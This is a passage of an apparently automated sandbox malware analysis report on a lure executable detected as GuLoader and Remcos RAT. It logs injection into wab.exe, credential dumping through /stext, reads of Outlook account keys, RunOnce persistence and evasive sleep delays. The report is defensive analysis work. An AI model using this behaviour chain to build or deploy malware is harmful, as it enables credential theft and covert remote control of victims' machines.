              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_004072B5
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00405461

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: DHRI_kurumsal kimlik rehberi-2023.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00404C9E4_2_00404C9E
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00406B154_2_00406B15
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_004072EC4_2_004072EC
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_6F3D1B5F4_2_6F3D1B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374DB5C17_2_374DB5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374E71947_2_374E7194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406E8F10_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B04010_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043610D10_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044731010_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044A49010_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040755A10_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043C56010_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B61010_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044D6C010_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004476F010_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B87010_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044081D10_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041495710_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004079EE10_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407AEB10_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044AA8010_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00412AA910_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B7410_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B0310_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044BBD810_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404BE510_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404C7610_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00415CFE10_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00416D7210_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D3010_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D8B10_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040D04411_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040503811_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004050A911_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040511A11_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004051AB11_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004382F311_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043057511_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043B67111_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041F6CD11_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004119CF11_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00439B1111_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00438E5411_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00412F6711_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043CF1811_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004050C212_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004014AB12_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040513312_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004051A412_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040124612_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040CA4612_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040523512_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004032C812_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040168912_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402F6012_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004016FC NtdllDefWindowProc_A,11_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004017B6 NtdllDefWindowProc_A,11_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402CAC NtdllDefWindowProc_A,12_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402D66 NtdllDefWindowProc_A,12_2_00402D66
              Source: DHRI_kurumsal kimlik rehberi-2023.exeStatic PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: Retarded.exe.7.drStatic PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: DHRI_kurumsal kimlik rehberi-2023.exeReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeFile read: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeJump to behavior
              Source: DHRI_kurumsal kimlik rehberi-2023.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-33004
              Source: unknownProcess created: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkut
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowx
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugrJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugrJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkutJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowxJump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,12_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQJump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeFile created: C:\Users\user\AppData\Local\Temp\nsf522F.tmpJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@11/19@3/3
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00402104 CoCreateInstance,4_2_00402104
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404722
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.37758445453.0000000037410000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: wab.exe, 0000000A.00000003.35577161768.0000000004D91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,10_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,10_2_0040B58D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: DHRI_kurumsal kimlik rehberi-2023.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000004.00000002.35514571711.000000000565D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.35514010061.0000000000821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHRI_kurumsal kimlik rehberi-2023.exe PID: 4520, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2806 push ecx; ret 7_2_374D2819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00444355 push ecx; ret 11_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004446D0 push eax; ret 11_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004446D0 push eax; ret 11_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044AC84 push eax; ret 11_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414039 push ecx; ret 12_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_6F3D1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_6F3D1B5F
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeFile created: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AnfgtendesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047C6
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6440Thread sleep count: 3600 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 196Thread sleep count: 72 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 196Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056Thread sleep count: 5339 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056Thread sleep time: -16017000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3600 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3600Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5339Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1746Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_374D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D6580 FindFirstFileExA,7_2_374D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
